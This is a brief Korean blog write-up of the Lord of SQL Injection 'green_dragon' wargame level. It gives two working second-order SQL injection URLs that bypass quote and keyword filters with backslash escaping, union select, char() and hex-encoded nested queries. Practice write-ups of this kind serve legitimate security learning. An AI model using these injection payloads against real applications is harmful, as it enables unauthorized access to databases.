$query가 실행된 결과가 $result에 담기는데, $result의 id, pw가 $query2에 담긴다.
sqli가 두 번 일어나게 만들어야 하는 것인가...
id, pw - prob _ . ' " 필터링
?id=\&pw=union select \,union select char(97,100,109,105,110)#
?id=\&pw=union select 0x5c,0x756e696f6e2073656c6563742030783631363436643639366523%23
설명하기 어렵다.. 생각해보면 된다.
https://man-25-1.tistory.com/106
[웹해킹] LOS 25 - (Green Dragon)
Lord of sql injection - green dragon 풀이 이제 풀다보니 dragon 까지 나오는군.... 그린 드래곤을 해치워보자 문제 접근 테이블이 출력되던 이전 문제들과 다른 문제 방식으로 변형됐다. 음 .. 필터링을 살
man-25-1.tistory.com
'워게임 > LOS' 카테고리의 다른 글
| blue_dragon(time based sql injection) (0) | 2021.10.09 |
|---|---|
| red_dragon(개행, 이분탐색) (0) | 2021.10.06 |
| evil_wizard (0) | 2021.10.06 |
| hell fire(order by) (0) | 2021.10.05 |
| dark_eyes(error based sqli 심화) (0) | 2021.10.05 |
댓글